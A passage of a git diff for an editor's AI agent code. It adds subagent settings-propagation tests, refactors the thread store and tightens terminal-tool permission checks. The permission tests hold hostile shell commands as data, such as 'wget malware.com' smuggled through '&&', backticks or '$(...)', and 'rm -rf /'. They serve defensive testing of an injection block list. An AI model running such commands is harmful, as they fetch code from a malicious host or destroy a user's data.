assert_eq!(tool_use.id, tool_use_id); - assert_eq!(tool_use.name, tool_name); - assert_eq!(tool_use.raw_input, raw_input.to_string()); - assert!(tool_use.is_input_complete); - // Should fall back to empty object for invalid JSON - assert_eq!(tool_use.input, json!({})); - } - _ => panic!("Expected 
ToolUse content"), - } - } + for subagent in &subagents { + let subagent_summary_id = subagent.read(cx).summarization_model().unwrap().id(); + assert_eq!( + subagent_summary_id.0.as_ref(), + "summary-model", + "Subagent summarization model should match parent after set_summarization_model" + ); + } + }); + } - // Insert the tool result (simulating what the caller does) - thread - .pending_message() - .tool_results - .insert(result.tool_use_id.clone(), result); + #[gpui::test] + async fn test_set_thinking_enabled_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); - // Verify the tool result was added - let last_message = thread.pending_message(); + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_thinking_enabled(true, cx); + }); + + for subagent in &subagents { + assert!( + subagent.read(cx).thinking_enabled(), + "Subagent thinking should be enabled after parent enables it" + ); + } + + parent.update(cx, |thread, cx| { + thread.set_thinking_enabled(false, cx); + }); + + for subagent in &subagents { + assert!( + !subagent.read(cx).thinking_enabled(), + "Subagent thinking should be disabled after parent disables it" + ); + } + }); + } + + #[gpui::test] + async fn test_set_thinking_effort_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); + + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_thinking_effort(Some("high".to_string()), cx); + }); + + for subagent in &subagents { assert_eq!( - last_message.tool_results.len(), - 1, - "Should have one tool_result" + subagent.read(cx).thinking_effort().map(|s| s.as_str()), + Some("high"), + "Subagent thinking effort should match parent" ); - assert!(last_message.tool_results.contains_key(&tool_use_id)); + } + + parent.update(cx, |thread, cx| { 
+ thread.set_thinking_effort(None, cx); + }); + + for subagent in &subagents { + assert_eq!( + subagent.read(cx).thinking_effort(), + None, + "Subagent thinking effort should be None after parent clears it" + ); + } + }); + } + + #[gpui::test] + async fn test_set_speed_propagates_to_subagents(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 2); + + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_speed(Speed::Fast, cx); + }); + + for subagent in &subagents { + assert_eq!( + subagent.read(cx).speed(), + Some(Speed::Fast), + "Subagent speed should match parent after set_speed" + ); + } + }); + } + + #[gpui::test] + async fn test_dropped_subagent_does_not_panic(cx: &mut TestAppContext) { + let (parent, _event_stream) = setup_thread_for_test(cx).await; + let subagents = setup_parent_with_subagents(cx, &parent, 1); + + // Drop the subagent so the WeakEntity can no longer be upgraded + drop(subagents); + + // Should not panic even though the subagent was dropped + cx.update(|cx| { + parent.update(cx, |thread, cx| { + thread.set_thinking_enabled(true, cx); + thread.set_speed(Speed::Fast, cx); + thread.set_thinking_effort(Some("high".to_string()), cx); }); }); } + + #[gpui::test] + async fn test_handle_tool_use_json_parse_error_adds_tool_use_to_content( + cx: &mut TestAppContext, + ) { + let (thread, event_stream) = setup_thread_for_test(cx).await; + + let tool_use_id = LanguageModelToolUseId::from("test_tool_id"); + let tool_name: Arc = Arc::from("test_tool"); + let raw_input: Arc = Arc::from("{invalid json"); + let json_parse_error = "expected value at line 1 column 1".to_string(); + + let (_cancellation_tx, cancellation_rx) = watch::channel(false); + + let result = cx + .update(|cx| { + thread.update(cx, |thread, cx| { + // Call the function under test + thread + .handle_tool_use_json_parse_error_event( + tool_use_id.clone(), + tool_name.clone(), + 
raw_input.clone(), + json_parse_error, + &event_stream, + cancellation_rx, + cx, + ) + .unwrap() + }) + }) + .await; + + // Verify the result is an error + assert!(result.is_error); + assert_eq!(result.tool_use_id, tool_use_id); + assert_eq!(result.tool_name, tool_name); + assert!(matches!( + result.content, + LanguageModelToolResultContent::Text(_) + )); + + thread.update(cx, |thread, _cx| { + // Verify the tool use was added to the message content + { + let last_message = thread.pending_message(); + assert_eq!( + last_message.content.len(), + 1, + "Should have one tool_use in content" + ); + + match &last_message.content[0] { + AgentMessageContent::ToolUse(tool_use) => { + assert_eq!(tool_use.id, tool_use_id); + assert_eq!(tool_use.name, tool_name); + assert_eq!(tool_use.raw_input, raw_input.to_string()); + assert!(tool_use.is_input_complete); + // Should fall back to empty object for invalid JSON + assert_eq!(tool_use.input, json!({})); + } + _ => panic!("Expected ToolUse content"), + } + } + + // Insert the tool result (simulating what the caller does) + thread + .pending_message() + .tool_results + .insert(result.tool_use_id.clone(), result); + + // Verify the tool result was added + let last_message = thread.pending_message(); + assert_eq!( + last_message.tool_results.len(), + 1, + "Should have one tool_result" + ); + assert!(last_message.tool_results.contains_key(&tool_use_id)); + }) + } } diff --git a/crates/agent/src/thread_store.rs b/crates/agent/src/thread_store.rs index 5cdce12125da8f7d26677388169e899f94b7e7f1..e62ff78871c65311627aab8f6a6e3c00481a0c2b 100644 --- a/crates/agent/src/thread_store.rs +++ b/crates/agent/src/thread_store.rs @@ -22,6 +22,10 @@ impl ThreadStore { cx.global::().0.clone() } + pub fn try_global(cx: &App) -> Option> { + cx.try_global::().map(|g| g.0.clone()) + } + pub fn new(cx: &mut Context) -> Self { let this = Self { threads: Vec::new(), @@ -87,14 +91,15 @@ impl ThreadStore { let database_connection = 
ThreadsDatabase::connect(cx); cx.spawn(async move |this, cx| { let database = database_connection.await.map_err(|err| anyhow!(err))?; - let threads = database - .list_threads() - .await? - .into_iter() - .filter(|thread| thread.parent_session_id.is_none()) - .collect::>(); + let all_threads = database.list_threads().await?; this.update(cx, |this, cx| { - this.threads = threads; + this.threads.clear(); + for thread in all_threads { + if thread.parent_session_id.is_some() { + continue; + } + this.threads.push(thread); + } cx.notify(); }) }) @@ -109,11 +114,8 @@ impl ThreadStore { self.threads.iter().cloned() } - /// Returns threads whose folder_paths match the given paths exactly. - pub fn threads_for_paths(&self, paths: &PathList) -> impl Iterator { - self.threads - .iter() - .filter(move |thread| &thread.folder_paths == paths) + pub fn entry_ids(&self) -> impl Iterator + '_ { + self.threads.iter().map(|t| t.id.clone()) } } @@ -145,6 +147,8 @@ mod tests { speed: None, thinking_enabled: false, thinking_effort: None, + draft_prompt: None, + ui_scroll_position: None, } } @@ -288,50 +292,4 @@ mod tests { assert_eq!(entries[0].id, first_id); assert_eq!(entries[1].id, second_id); } - - #[gpui::test] - async fn test_threads_for_paths_filters_correctly(cx: &mut TestAppContext) { - let thread_store = cx.new(|cx| ThreadStore::new(cx)); - cx.run_until_parked(); - - let project_a_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-a")]); - let project_b_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-b")]); - - let thread_a = make_thread( - "Thread in A", - Utc.with_ymd_and_hms(2024, 1, 1, 0, 0, 0).unwrap(), - ); - let thread_b = make_thread( - "Thread in B", - Utc.with_ymd_and_hms(2024, 1, 2, 0, 0, 0).unwrap(), - ); - let thread_a_id = session_id("thread-a"); - let thread_b_id = session_id("thread-b"); - - let save_a = thread_store.update(cx, |store, cx| { - store.save_thread(thread_a_id.clone(), thread_a, project_a_paths.clone(), cx) - 
}); - save_a.await.unwrap(); - - let save_b = thread_store.update(cx, |store, cx| { - store.save_thread(thread_b_id.clone(), thread_b, project_b_paths.clone(), cx) - }); - save_b.await.unwrap(); - - cx.run_until_parked(); - - thread_store.read_with(cx, |store, _cx| { - let a_threads: Vec<_> = store.threads_for_paths(&project_a_paths).collect(); - assert_eq!(a_threads.len(), 1); - assert_eq!(a_threads[0].id, thread_a_id); - - let b_threads: Vec<_> = store.threads_for_paths(&project_b_paths).collect(); - assert_eq!(b_threads.len(), 1); - assert_eq!(b_threads[0].id, thread_b_id); - - let nonexistent = PathList::new(&[std::path::PathBuf::from("/nonexistent")]); - let no_threads: Vec<_> = store.threads_for_paths(&nonexistent).collect(); - assert!(no_threads.is_empty()); - }); - } } diff --git a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 79564bbddea7063d00e18d97c8eab89533b20da5..58e779da59aef176464839ed6f2d6a5c16e4bc12 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -2,13 +2,19 @@ use crate::AgentTool; use crate::tools::TerminalTool; use agent_settings::{AgentSettings, CompiledRegex, ToolPermissions, ToolRules}; use settings::ToolPermissionMode; -use shell_command_parser::extract_commands; +use shell_command_parser::{ + TerminalCommandValidation, extract_commands, validate_terminal_command, +}; use std::path::{Component, Path}; use std::sync::LazyLock; use util::shell::ShellKind; const HARDCODED_SECURITY_DENIAL_MESSAGE: &str = "Blocked by built-in security rule. This operation is considered too \ harmful to be allowed, and cannot be overridden by settings."; +const INVALID_TERMINAL_COMMAND_MESSAGE: &str = "The terminal command could not be approved because terminal does not \ + allow shell substitutions or interpolations in permission-protected commands. Forbidden examples include $VAR, \ + ${VAR}, $(...), backticks, $((...)), <(...), and >(...). 
Resolve those values before calling terminal, or ask \ + the user for the literal value to use."; /// Security rules that are always enforced and cannot be overridden by any setting. /// These protect against catastrophic operations like wiping filesystems. @@ -256,7 +262,30 @@ impl ToolPermissionDecision { return denial; } - let rules = match permissions.tools.get(tool_name) { + let rules = permissions.tools.get(tool_name); + + // Check for invalid regex patterns before evaluating rules. + // If any patterns failed to compile, block the tool call entirely. + if let Some(error) = rules.and_then(|rules| check_invalid_patterns(tool_name, rules)) { + return ToolPermissionDecision::Deny(error); + } + + if tool_name == TerminalTool::NAME + && !rules.map_or( + matches!(permissions.default, ToolPermissionMode::Allow), + |rules| is_unconditional_allow_all(rules, permissions.default), + ) + && inputs.iter().any(|input| { + matches!( + validate_terminal_command(input), + TerminalCommandValidation::Unsafe | TerminalCommandValidation::Unsupported + ) + }) + { + return ToolPermissionDecision::Deny(INVALID_TERMINAL_COMMAND_MESSAGE.into()); + } + + let rules = match rules { Some(rules) => rules, None => { // No tool-specific rules, use the global default @@ -270,12 +299,6 @@ impl ToolPermissionDecision { } }; - // Check for invalid regex patterns before evaluating rules. - // If any patterns failed to compile, block the tool call entirely. - if let Some(error) = check_invalid_patterns(tool_name, rules) { - return ToolPermissionDecision::Deny(error); - } - // For the terminal tool, parse each input command to extract all sub-commands. // This prevents shell injection attacks where a user configures an allow // pattern like "^ls" and an attacker crafts "ls && rm -rf /". 
@@ -407,6 +430,18 @@ fn check_commands( } } +fn is_unconditional_allow_all(rules: &ToolRules, global_default: ToolPermissionMode) -> bool { + // `always_allow` is intentionally not checked here: when the effective default + // is already Allow and there are no deny/confirm restrictions, allow patterns + // are redundant — the user has opted into allowing everything. + rules.always_deny.is_empty() + && rules.always_confirm.is_empty() + && matches!( + rules.default.unwrap_or(global_default), + ToolPermissionMode::Allow + ) +} + /// Checks if the tool rules contain any invalid regex patterns. /// Returns an error message if invalid patterns are found. fn check_invalid_patterns(tool_name: &str, rules: &ToolRules) -> Option { @@ -528,7 +563,7 @@ mod tests { use crate::tools::{DeletePathTool, EditFileTool, FetchTool, TerminalTool}; use agent_settings::{AgentProfileId, CompiledRegex, InvalidRegexPattern, ToolRules}; use gpui::px; - use settings::{DefaultAgentView, DockPosition, NotifyWhenAgentWaiting}; + use settings::{DockPosition, NotifyWhenAgentWaiting, PlaySoundWhenAgentDone}; use std::sync::Arc; fn test_agent_settings(tool_permissions: ToolPermissions) -> AgentSettings { @@ -536,6 +571,7 @@ mod tests { enabled: true, button: true, dock: DockPosition::Right, + flexible: true, default_width: px(300.), default_height: px(600.), default_model: None, @@ -546,10 +582,9 @@ mod tests { inline_alternatives: vec![], favorite_models: vec![], default_profile: AgentProfileId::default(), - default_view: DefaultAgentView::Thread, profiles: Default::default(), notify_when_agent_waiting: NotifyWhenAgentWaiting::default(), - play_sound_when_agent_done: false, + play_sound_when_agent_done: PlaySoundWhenAgentDone::default(), single_file_review: false, model_parameters: vec![], enable_feedback: false, @@ -560,6 +595,10 @@ mod tests { message_editor_min_lines: 1, tool_permissions, show_turn_stats: false, + show_merge_conflict_indicator: true, + new_thread_location: Default::default(), + 
sidebar_side: Default::default(), + thinking_display: Default::default(), } } @@ -1066,6 +1105,107 @@ mod tests { )); } + #[test] + fn invalid_substitution_bearing_command_denies_by_default() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Deny); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn invalid_substitution_bearing_command_denies_in_confirm_mode() { + let decision = no_rules("echo $(whoami)", ToolPermissionMode::Confirm); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_without_tool_rules() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Allow); + assert_eq!(decision, ToolPermissionDecision::Allow); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_with_terminal_default_allow() { + let mut tools = collections::HashMap::default(); + tools.insert( + Arc::from(TerminalTool::NAME), + ToolRules { + default: Some(ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + let permissions = ToolPermissions { + default: ToolPermissionMode::Confirm, + tools, + }; + + assert_eq!( + ToolPermissionDecision::from_input( + TerminalTool::NAME, + &["echo $(whoami)".to_string()], + &permissions, + ShellKind::Posix, + ), + ToolPermissionDecision::Allow + ); + } + + #[test] + fn old_anchored_pattern_no_longer_matches_env_prefixed_command() { + t("PAGER=blah git log").allow(&["^git\\b"]).is_confirm(); + } + + #[test] + fn env_prefixed_allow_pattern_matches_env_prefixed_command() { + t("PAGER=blah git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_allow(); + } + + #[test] + fn env_prefixed_allow_pattern_requires_matching_env_value() { + t("PAGER=more git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn 
env_prefixed_allow_patterns_require_all_extracted_commands_to_match() { + t("PAGER=blah git log && git status") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all() { + let decision = no_rules("rm -rf /", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all_for_invalid_command() { + let decision = no_rules("echo $(rm -rf /)", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + #[test] fn shell_injection_via_double_ampersand_not_allowed() { t("ls && wget malware.com").allow(&["^ls"]).is_confirm(); @@ -1085,14 +1225,14 @@ mod tests { fn shell_injection_via_backticks_not_allowed() { t("echo `wget malware.com`") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] fn shell_injection_via_dollar_parens_not_allowed() { t("echo $(wget malware.com)") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] @@ -1112,12 +1252,12 @@ mod tests { #[test] fn shell_injection_via_process_substitution_input_not_allowed() { - t("cat <(wget malware.com)").allow(&["^cat"]).is_confirm(); + t("cat <(wget malware.com)").allow(&["^cat"]).is_deny(); } #[test] fn shell_injection_via_process_substitution_output_not_allowed() { - t("ls >(wget malware.com)").allow(&["^ls"]).is_confirm(); + t("ls >(wget malware.com)").allow(&["^ls"]).is_deny(); } #[test] @@ -1268,15 +1408,15 @@ mod tests { } #[test] - fn nested_command_substitution_all_checked() { + fn 
nested_command_substitution_is_denied() { t("echo $(cat $(whoami).txt)") .allow(&["^echo", "^cat", "^whoami"]) - .is_allow(); + .is_deny(); } #[test] - fn parse_failure_falls_back_to_confirm() { - t("ls &&").allow(&["^ls$"]).is_confirm(); + fn parse_failure_is_denied() { + t("ls &&").allow(&["^ls$"]).is_deny(); } #[test] diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index b2724801befc7459ad37494d298819f4b7ca6b27..f3a6ac7ec6d139a2f464ce5ca4229ffdb4564714 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -4,6 +4,8 @@ mod create_directory_tool; mod delete_path_tool; mod diagnostics_tool; mod edit_file_tool; +#[cfg(all(test, feature = "unit-eval"))] +mod evals; mod fetch_tool; mod find_path_tool; mod grep_tool; @@ -17,7 +19,9 @@ mod save_file_tool; mod spawn_agent_tool; mod streaming_edit_file_tool; mod terminal_tool; +mod tool_edit_parser; mod tool_permissions; +mod update_plan_tool; mod web_search_tool; use crate::AgentTool; @@ -43,6 +47,7 @@ pub use spawn_agent_tool::*; pub use streaming_edit_file_tool::*; pub use terminal_tool::*; pub use tool_permissions::*; +pub use update_plan_tool::*; pub use web_search_tool::*; macro_rules! tools { @@ -131,5 +136,6 @@ tools! 
{ SaveFileTool, SpawnAgentTool, TerminalTool, + UpdatePlanTool, WebSearchTool, } diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 1c7590d8097a5de50b879d5b253c5dbabd3dcbab..df4cc313036b55e8842a9c46567256afb92ed944 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -253,12 +253,14 @@ impl ContextServerRegistry { let project::context_server_store::ServerStatusChangedEvent { server_id, status } = event; match status { - ContextServerStatus::Starting => {} + ContextServerStatus::Starting | ContextServerStatus::Authenticating => {} ContextServerStatus::Running => { self.reload_tools_for_server(server_id.clone(), cx); self.reload_prompts_for_server(server_id.clone(), cx); } - ContextServerStatus::Stopped | ContextServerStatus::Error(_) => { + ContextServerStatus::Stopped + | ContextServerStatus::Error(_) + | ContextServerStatus::AuthRequired => { if let Some(registered_server) = self.registered_servers.remove(server_id) { if !registered_server.tools.is_empty() { cx.emit(ContextServerRegistryEvent::ToolsChanged); diff --git a/crates/agent/src/tools/copy_path_tool.rs b/crates/agent/src/tools/copy_path_tool.rs index 7f53a5c36a7979a01de96535f19e421fa3119e16..06600f64874851c8d703513ea006d7f0327a0952 100644 --- a/crates/agent/src/tools/copy_path_tool.rs +++ b/crates/agent/src/tools/copy_path_tool.rs @@ -266,7 +266,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -372,13 +375,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - 
event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -444,8 +450,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); diff --git a/crates/agent/src/tools/create_directory_tool.rs b/crates/agent/src/tools/create_directory_tool.rs index 5d8930f3c7400428d55cfe7d14bafc16d94be43a..60bb44e39ee5ab76168d909c08889cbbbc63f9f4 100644 --- a/crates/agent/src/tools/create_directory_tool.rs +++ b/crates/agent/src/tools/create_directory_tool.rs @@ -241,7 +241,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -359,13 +362,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -434,8 +440,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); diff --git 
a/crates/agent/src/tools/delete_path_tool.rs b/crates/agent/src/tools/delete_path_tool.rs index 27ab68db667a4cf3223e6521682814dc1c245bb7..21b4674425d9169e7740dd35c929302814006684 100644 --- a/crates/agent/src/tools/delete_path_tool.rs +++ b/crates/agent/src/tools/delete_path_tool.rs @@ -301,7 +301,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -428,13 +431,16 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Expected a single authorization prompt", ); @@ -507,8 +513,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - event_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + event_rx.try_recv(), + Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 3e1e0661f126d464c8d4611e2b3d85a9f668a5ca..9bcf164096b99675febd3d7ae1bde8341f7c5ff8 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -3,19 +3,18 @@ use super::save_file_tool::SaveFileTool; use super::tool_permissions::authorize_file_edit; use crate::{ AgentTool, Templates, Thread, ToolCallEventStream, ToolInput, - edit_agent::{EditAgent, EditAgentOutput, EditAgentOutputEvent, EditFormat}, + edit_agent::{EditAgent, EditAgentOutputEvent, EditFormat}, }; use 
acp_thread::Diff; use agent_client_protocol::{self as acp, ToolCallLocation, ToolCallUpdateFields}; use anyhow::{Context as _, Result}; -use cloud_llm_client::CompletionIntent; use collections::HashSet; use futures::{FutureExt as _, StreamExt as _}; use gpui::{App, AppContext, AsyncApp, Entity, Task, WeakEntity}; use indoc::formatdoc; use language::language_settings::{self, FormatOnSave}; use language::{LanguageRegistry, ToPoint}; -use language_model::LanguageModelToolResultContent; +use language_model::{CompletionIntent, LanguageModelToolResultContent}; use project::lsp_store::{FormatTrigger, LspFormatTarget}; use project::{Project, ProjectPath}; use schemars::JsonSchema; @@ -104,8 +103,6 @@ pub enum EditFileToolOutput { old_text: Arc, #[serde(default)] diff: String, - #[serde(alias = "raw_output")] - edit_agent_output: EditAgentOutput, }, Error { error: String, @@ -253,7 +250,7 @@ impl AgentTool for EditFileTool { error: "thread was dropped".to_string(), })?; - let (project_path, abs_path, allow_thinking, authorize) = + let (project_path, abs_path, allow_thinking, update_agent_location, authorize) = cx.update(|cx| { let project_path = resolve_path(&input, project.clone(), cx).map_err(|err| { EditFileToolOutput::Error { @@ -271,8 +268,11 @@ impl AgentTool for EditFileTool { .thread .read_with(cx, |thread, _cx| thread.thinking_enabled()) .unwrap_or(true); + + let update_agent_location = self.thread.read_with(cx, |thread, _cx| !thread.is_subagent()).unwrap_or_default(); + let authorize = self.authorize(&input, &event_stream, cx); - Ok::<_, EditFileToolOutput>((project_path, abs_path, allow_thinking, authorize)) + Ok::<_, EditFileToolOutput>((project_path, abs_path, allow_thinking, update_agent_location, authorize)) })?; let result: anyhow::Result = async { @@ -293,6 +293,7 @@ impl AgentTool for EditFileTool { self.templates.clone(), edit_format, allow_thinking, + update_agent_location, ); let buffer = project @@ -303,13 +304,13 @@ impl AgentTool for EditFileTool { 
// Check if the file has been modified since the agent last read it if let Some(abs_path) = abs_path.as_ref() { - let (last_read_mtime, current_mtime, is_dirty, has_save_tool, has_restore_tool) = self.thread.update(cx, |thread, cx| { - let last_read = thread.file_read_times.get(abs_path).copied(); + let last_read_mtime = action_log.read_with(cx, |log, _| log.file_read_time(abs_path)); + let (current_mtime, is_dirty, has_save_tool, has_restore_tool) = self.thread.read_with(cx, |thread, cx| { let current = buffer.read(cx).file().and_then(|file| file.disk_state().mtime()); let dirty = buffer.read(cx).is_dirty(); let has_save = thread.has_tool(SaveFileTool::NAME); let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); - (last_read, current, dirty, has_save, has_restore) + (current, dirty, has_save, has_restore) })?; // Check for unsaved changes first - these indicate modifications we don't know about @@ -417,29 +418,14 @@ impl AgentTool for EditFileTool { EditAgentOutputEvent::AmbiguousEditRange(ranges) => ambiguous_ranges = ranges, EditAgentOutputEvent::ResolvingEditRange(range) => { diff.update(cx, |card, cx| card.reveal_range(range.clone(), cx)); - // if !emitted_location { - // let line = buffer.update(cx, |buffer, _cx| { - // range.start.to_point(&buffer.snapshot()).row - // }).ok(); - // if let Some(abs_path) = abs_path.clone() { - // event_stream.update_fields(ToolCallUpdateFields { - // locations: Some(vec![ToolCallLocation { path: abs_path, line }]), - // ..Default::default() - // }); - // } - // } } } } - let edit_agent_output = output.await?; + output.await?; let format_on_save_enabled = buffer.read_with(cx, |buffer, cx| { - let settings = language_settings::language_settings( - buffer.language().map(|l| l.name()), - buffer.file(), - cx, - ); + let settings = language_settings::LanguageSettings::for_buffer(buffer, cx); settings.format_on_save != FormatOnSave::Off }); @@ -468,17 +454,6 @@ impl AgentTool for EditFileTool { 
log.buffer_edited(buffer.clone(), cx); }); - // Update the recorded read time after a successful edit so consecutive edits work - if let Some(abs_path) = abs_path.as_ref() { - if let Some(new_mtime) = buffer.read_with(cx, |buffer, _| { - buffer.file().and_then(|file| file.disk_state().mtime()) - }) { - self.thread.update(cx, |thread, _| { - thread.file_read_times.insert(abs_path.to_path_buf(), new_mtime); - })?; - } - } - let new_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); let (new_text, unified_diff) = cx .background_spawn({ @@ -524,7 +499,6 @@ impl AgentTool for EditFileTool { new_text, old_text, diff: unified_diff, - edit_agent_output, }) }.await; result @@ -1214,7 +1188,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // Test 4: Path with .zed in the middle should require confirmation let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -1277,7 +1251,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // 5.3: Normal in-project path with allow — no confirmation needed let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); @@ -1294,7 +1268,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); // 5.4: With Confirm default, non-project paths still prompt cx.update(|cx| { @@ -1384,7 +1358,10 @@ mod tests { event .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); authorize_task.await.unwrap(); } @@ -1609,8 +1586,8 @@ mod tests { assert!(result.is_err(), "Tool should fail when policy denies"); assert!( !matches!( - stream_rx.try_next(), - Ok(Some(Ok(crate::ThreadEvent::ToolCallAuthorization(_)))) + stream_rx.try_recv(), + 
Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) ), "Deny policy should not emit symlink authorization prompt", ); @@ -1681,7 +1658,7 @@ mod tests { } else { auth.await.unwrap(); assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -1792,7 +1769,7 @@ mod tests { } else { auth.await.unwrap(); assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -1885,7 +1862,7 @@ mod tests { stream_rx.expect_authorization().await; } else { assert!( - stream_rx.try_next().is_err(), + stream_rx.try_recv().is_err(), "Failed for case: {} - path: {} - expected no confirmation but got one", description, path @@ -1986,7 +1963,7 @@ mod tests { }) .await .unwrap(); - assert!(stream_rx.try_next().is_err()); + assert!(stream_rx.try_recv().is_err()); } } @@ -2211,14 +2188,18 @@ mod tests { let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); // Initially, file_read_times should be empty - let is_empty = thread.read_with(cx, |thread, _| thread.file_read_times.is_empty()); + let is_empty = action_log.read_with(cx, |action_log, _| { + action_log + .file_read_time(path!("/root/test.txt").as_ref()) + .is_none() + }); assert!(is_empty, "file_read_times should start empty"); // Create read tool let read_tool = Arc::new(crate::ReadFileTool::new( - 